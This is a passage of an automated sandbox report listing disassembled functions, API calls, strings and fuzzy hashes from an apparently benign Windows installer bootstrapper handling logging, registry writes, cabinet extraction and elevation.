Function 007C70D4 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 007C70E7

Strings

Failed to format escape sequence., xrefs: 007C7181
Failed to allocate buffer for escaped string., xrefs: 007C70FE
Failed to append escape sequence., xrefs: 007C717A
Failed to append characters., xrefs: 007C7173
[\%c], xrefs: 007C7146
Failed to copy string., xrefs: 007C719B
[]{}, xrefs: 007C7111

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: 297df55e8710509dab967fe9adda56decbc49e9f1a8ea03ad0a593f6ddd5c6f7
Instruction ID: 98950eb3e3f6f18a68fa072ba295795e24a99905f837ac9a1eb53bbec379ed78
Opcode Fuzzy Hash: 297df55e8710509dab967fe9adda56decbc49e9f1a8ea03ad0a593f6ddd5c6f7
Instruction Fuzzy Hash: B321093394821DFBDB255A94CC06FAE7768EB40720F24026DF800F6181DF7CAE41DA95

Function 007E59B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0080B4F0,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,007E659B,?,00000001,?,0080B490), ref: 007E5A19

Strings

feclient.dll, xrefs: 007E5A0F, 007E5B39
Failed to copy target product code., xrefs: 007E5B4C
Failed grow array of ordered patches., xrefs: 007E5AB2
Failed to plan action for target product., xrefs: 007E5AC4
Failed to insert execute action., xrefs: 007E5A6E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: 15b253c13c495256e68ecd2b87cd949ed8680db3c7f5022d825fbcd8f574d51f
Instruction ID: cad25a70c35818463124045327970d137e764d9cf7b1d51566f354fada0c8a4b
Opcode Fuzzy Hash: 15b253c13c495256e68ecd2b87cd949ed8680db3c7f5022d825fbcd8f574d51f
Instruction Fuzzy Hash: 638114B560179ADFCB14CF59C880AAA7BA4FF08328B15866AEC159B352D738EC51CF50

Function 007E9039 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 171COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,007D6F20,000000B8,0000001C,00000100), ref: 007E9068
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0080B4A8,000000FF,?,?,?,007D6F20,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 007E9101

Strings

comres.dll, xrefs: 007E9187
detect.cpp, xrefs: 007E9163
BA aborted detect forward compatible bundle., xrefs: 007E916D
Failed to initialize update bundle., xrefs: 007E91A9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: 959798d0a9de4c51aae162372379a5d537d3f4272e9416efadb31c61c923a798
Instruction ID: dffff6d68ea7f8413ededdbc66afec0a44f763d79b5fd9c5d969cb11de2f9e8c
Opcode Fuzzy Hash: 959798d0a9de4c51aae162372379a5d537d3f4272e9416efadb31c61c923a798
Instruction Fuzzy Hash: DC510172601246FFDF159F35CC85E6AB7AAFF09320B104268FA25CA291E735DC60CB90

Function 007FC9BD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007FD132,?,00000000,?,00000000,00000000), ref: 007FC9FF
__fassign.LIBCMT ref: 007FCA7A
__fassign.LIBCMT ref: 007FCA95
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007FCABB
WriteFile.KERNEL32(?,?,00000000,007FD132,00000000,?,?,?,?,?,?,?,?,?,007FD132,?), ref: 007FCADA
WriteFile.KERNEL32(?,?,00000001,007FD132,00000000,?,?,?,?,?,?,?,?,?,007FD132,?), ref: 007FCB13

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6df9197c3a9c2c58f1852fa1e52a47464934fbddeabf24b3d09a56189b331abe
Instruction ID: f2b7cc92467d5f94965463fdd24989c2882b37d0df4027308bc0f76ebfc3fa4d
Opcode Fuzzy Hash: 6df9197c3a9c2c58f1852fa1e52a47464934fbddeabf24b3d09a56189b331abe
Instruction Fuzzy Hash: 72519FB5A0024D9FCB15CFA8D986AEEBBF4FF09300F14451AE655E7391E734A941CBA0

Function 008001F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00800234
GetComputerNameW.KERNEL32(?,?), ref: 0080028C

Strings

Computer : %ls, xrefs: 008002FA
=== Logging started: %ls ===, xrefs: 008002B7
--- logging level: %hs ---, xrefs: 0080034C
Executable: %ls v%d.%d.%d.%d, xrefs: 008002E8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 2577110986-3153207428
Opcode ID: 07ca1c51c38c10b10b97e247f5dcc978c107aa4e09d6052f4548e3b47ca1babc
Instruction ID: 2fe87c55c7e528ded1a545bf3f87fdc2f83b71e8fb1193bd1572923490fb4199
Opcode Fuzzy Hash: 07ca1c51c38c10b10b97e247f5dcc978c107aa4e09d6052f4548e3b47ca1babc
Instruction Fuzzy Hash: AC4174F290011C9FCB619F64DC89AEA77BCFB55304F0141A9F509E7281D630AE858F65

Function 0080143C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 00801479
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 008014F1
lstrlenW.KERNEL32(?,?,?,?,00000001), ref: 008014FD
RegSetValueExW.ADVAPI32(00020006,?,00000000,00000007,00000000,?,00000000,?,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006), ref: 0080153D

Strings

regutil.cpp, xrefs: 00801565
BundleUpgradeCode, xrefs: 00801442

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: c193b8ed7064b0bd0e1c31e61cd982117c8aa07df7a7b4b8899e4c9f70df145c
Instruction ID: 464a4f7f24a89b7f9423be2c521ba126f42202464d8ed9483f7fece5df058b17
Opcode Fuzzy Hash: c193b8ed7064b0bd0e1c31e61cd982117c8aa07df7a7b4b8899e4c9f70df145c
Instruction Fuzzy Hash: 0941A772E0062AAFCF21DFA8DC45AAE7BAAFF44720F154169FD05EB251D630DD118B90

Function 007DD206 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,0080B4F0,?,00000001,000000FF,?,?,7694B390,00000000,00000001,00000000,?,007D72F3), ref: 007DD32F

Strings

Failed to elevate., xrefs: 007DD311
Failed to create pipe and cache pipe., xrefs: 007DD28C
Failed to connect to elevated child process., xrefs: 007DD318
UX aborted elevation requirement., xrefs: 007DD244
Failed to create pipe name and client token., xrefs: 007DD270
elevation.cpp, xrefs: 007DD23A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 6aa61678574a6efedf9ec9fd3c68307530941d07d32d95342c0166a7681b5eb1
Instruction ID: 43571340a3ec53d101df1e5b721473057f946b0892165a4295a009776cbba3ee
Opcode Fuzzy Hash: 6aa61678574a6efedf9ec9fd3c68307530941d07d32d95342c0166a7681b5eb1
Instruction Fuzzy Hash: AC312672A44621FBE735A660DC4AFAB677CFF00730F10021BF905E6381DA69AE5082A5

Function 0080041B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0082B60C,00000000,?,?,?,007C5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0080042B
CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,0082B604,?,007C5407,00000000,Setup), ref: 008004CC
GetLastError.KERNEL32(?,007C5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 008004DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,007C5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00800515

Part of subcall function 007C2DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 007C2F1F

LeaveCriticalSection.KERNEL32(0082B60C,?,?,0082B604,?,007C5407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0080056E

Strings

logutil.cpp, xrefs: 008004FA

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: c4d609eb83432f233de6d22d7e3af1bf81d4e3b9fbf00103d31d346e035e18e6
Instruction ID: 6106423a330c3ad5d1ecf03f24338b107e44ccdf6cdf68bd38dc840027c2a155
Opcode Fuzzy Hash: c4d609eb83432f233de6d22d7e3af1bf81d4e3b9fbf00103d31d346e035e18e6
Instruction Fuzzy Hash: 10319E71E02629FFEB61AF609C86F6A37A8FB10B55F044129FA00F61A1D734CD409FA0

Function 007E3750 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007E37B7

Strings

Failed to format property value., xrefs: 007E3840
Failed to format property string part., xrefs: 007E3832
Failed to escape string., xrefs: 007E3839
%s%="%s", xrefs: 007E37EA
Failed to append property string part., xrefs: 007E382B

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 0d8fd95715357b3972e4edd4b122677a1e3cfec559417e4d47c04e6f721599ac
Instruction ID: 0d74ed6ad2bd9c1d43f4c29017f49efad13db96ef0e4d258e21af76d99853f17
Opcode Fuzzy Hash: 0d8fd95715357b3972e4edd4b122677a1e3cfec559417e4d47c04e6f721599ac
Instruction Fuzzy Hash: 6C31C3B2902259EFDB159F95CC89EAEB778EF08B10F10016EF91167241D7789F50DBA0

Function 007C7203 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,007C583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 007C7215
LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,007C583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 007C72F4

Strings

Failed to get variable: %ls, xrefs: 007C7256
Failed to get value as string for variable: %ls, xrefs: 007C72E3
Failed to format value '%ls' of variable: %ls, xrefs: 007C72BE
Failed to get unformatted string., xrefs: 007C7285
*****, xrefs: 007C72B0, 007C72BD

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 46c4934ffcd640e85e441151f8f159041dba54f16c266e2796f0606e5eeec314
Instruction ID: ab72ac999a07b5d6b07cf08a1238522d811a2f548aea6149aff15da4ad19970b
Opcode Fuzzy Hash: 46c4934ffcd640e85e441151f8f159041dba54f16c266e2796f0606e5eeec314
Instruction Fuzzy Hash: C1319C3290462AFBCF255B90CC05F9E7B78FB14360F10422DF804A6690DB39AAA1DFC0

Function 007D8BE5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 007D8C30
GetLastError.KERNEL32(?,?,?,00000001), ref: 007D8C3A
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 007D8C9A

Strings

Failed to initialize ACL., xrefs: 007D8C68
Failed to allocate administrator SID., xrefs: 007D8C16
cache.cpp, xrefs: 007D8C5E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 4b60ef907ffe3c39bf93bf5757c86ace0455ba07e4ca588154bda1812dc5be28
Instruction ID: a70113600033040e29dd9f2d6b37cef7881997722db1ef98b7614f769e8bcc7c
Opcode Fuzzy Hash: 4b60ef907ffe3c39bf93bf5757c86ace0455ba07e4ca588154bda1812dc5be28
Instruction Fuzzy Hash: 4821C672A51314FBEB609A999C86F9BB7BDFB00710F11406AF914F7280EA745E0096B1

Function 007C410D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,007D3ED4,00000001,feclient.dll,?,00000000,?,?,?,007C4A0C), ref: 007C4148
GetLastError.KERNEL32(?,?,007D3ED4,00000001,feclient.dll,?,00000000,?,?,?,007C4A0C,?,?,0080B478,?,00000001), ref: 007C4154
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,007D3ED4,00000001,feclient.dll,?,00000000,?,?,?,007C4A0C,?), ref: 007C418F
GetLastError.KERNEL32(?,?,007D3ED4,00000001,feclient.dll,?,00000000,?,?,?,007C4A0C,?,?,0080B478,?,00000001), ref: 007C4199

Strings

dirutil.cpp, xrefs: 007C41BD
crypt32.dll, xrefs: 007C4111

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: 21a812879fe79587148291369e629892958ac1d59c04cd08e308b38a9f422401
Instruction ID: 8dc4b5764d8c30420e02295102144506187612e05dd734c25071be27560ecb7a
Opcode Fuzzy Hash: 21a812879fe79587148291369e629892958ac1d59c04cd08e308b38a9f422401
Instruction Fuzzy Hash: 2D11B976E0072AABE7219AA98C94F6BB7ECEF14791B15413DFD44E7210F768CC4086E0

Function 007C999B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C99B6
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 007C99CE
GetLastError.KERNEL32 ref: 007C99D9

Strings

Failed to set variable., xrefs: 007C9A4E
Failed to format variable string., xrefs: 007C99C1
Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9A16

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: dcc0f9a06bae83826ed53c1f3411ac02e2924bcf6f759acb883ca2b98aad71c8
Instruction ID: f3d6eec8373123eb8b177333231cf33cd2cea2e84a2157a9ff6a5c8baf51f216
Opcode Fuzzy Hash: dcc0f9a06bae83826ed53c1f3411ac02e2924bcf6f759acb883ca2b98aad71c8
Instruction Fuzzy Hash: C621FC32E40614B7CB915AA4DC49F9DB765FF54320F20831DF911B2190E7395D50DAD1

Function 007E08F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 007E0940
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 007E095F
GetLastError.KERNEL32 ref: 007E0969

Strings

cabextract.cpp, xrefs: 007E098D
Unexpected call to CabWrite()., xrefs: 007E0923
Failed to write during cabinet extraction., xrefs: 007E0997

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: a15cf0e464aecf4b3e814229e7b06221bf0bcddc48c1d3439088db110115f85d
Instruction ID: ce2067b212e6909ccfeb451174cf713a5053b32b01efbbf744b6e7ad948bb8d9
Opcode Fuzzy Hash: a15cf0e464aecf4b3e814229e7b06221bf0bcddc48c1d3439088db110115f85d
Instruction Fuzzy Hash: 9F21BB76201200AFEB04DF6DDD85EAA37F9FF88720B114059FE18C7252D675EA108BA0

Function 007E09B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 007E0A25
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007E0A37
SetFileTime.KERNEL32(?,?,?,?), ref: 007E0A4A
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,007E0616,?,?), ref: 007E0A59

Strings

cabextract.cpp, xrefs: 007E09F4
Invalid operation for this state., xrefs: 007E09FE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: ffad2c86ec73fb9afb475c5075412c5e91da1aa646343a47a2ab511afb6b771b
Instruction ID: d468674e394b5528785e42db4c296b8e9d2f82c26dd73b33ae60d3942f0761d7
Opcode Fuzzy Hash: ffad2c86ec73fb9afb475c5075412c5e91da1aa646343a47a2ab511afb6b771b
Instruction Fuzzy Hash: 0C21C67280121DABC7109FA9DC489EA7BBCFE08720B14822AF411D65D0D7B8DA51CBD0

Function 007C9908 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 007C997F

Strings

=S|, xrefs: 007C9908
Condition, xrefs: 007C991A
Failed to get Condition inner text., xrefs: 007C994F
Failed to copy condition string from BSTR, xrefs: 007C9969
Failed to select condition node., xrefs: 007C9936

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FreeString
String ID: =S|$Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
API String ID: 3341692771-641519119
Opcode ID: 8f8b54754f9f4f1898937be2dab6b9b434a349c013581edd218613c460f1f387
Instruction ID: 320e628c2cc7df68bbc56bb90570ae104b860f814b00328c93b691b33905217d
Opcode Fuzzy Hash: 8f8b54754f9f4f1898937be2dab6b9b434a349c013581edd218613c460f1f387
Instruction Fuzzy Hash: E0118232940228BBDB959B94CD09FADBB68FF40720F11416DF900B6290DB79AE10E781

Function 007C6644 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007C667D
GetLastError.KERNEL32 ref: 007C6687

Strings

Failed to set variant value., xrefs: 007C66D1
Failed to get temp path., xrefs: 007C66B5
variable.cpp, xrefs: 007C66AB
4#v, xrefs: 007C667D

Memory Dump Source

